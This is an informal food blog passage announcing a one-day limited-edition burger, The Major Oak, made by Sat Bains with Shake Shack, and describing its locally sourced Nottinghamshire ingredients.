you’re big on food you’ll probably have heard of Sat Bains, the two Michelin stared restaurant in Nottingham which is as big on its staff as it is on its food. We certainly have and whilst we’re hoping to visit soon in the meantime we’re gonna get a cheeky pre-fix at Shake Shack. Oh yes, for ONE DAY ONLY on Friday 9th October, Sat have co-labed with Shake Shack to created a limited edition burger named The Major Oak.

That’s a beef burger topped with shallots, a slice of creamy blue Beauvale cheese from Nottinghamshire’s Cropwell Bishop Creamery, a touch of pine from the needles of local coniferous trees and a forest-inspired ketchup made of seasonal “Penny Bun” mushrooms, as well as a smoked mayo with a hint of charcoal from Sherwood Forest’s red Oaks. There’s only 500 available and it’s first come, first served!
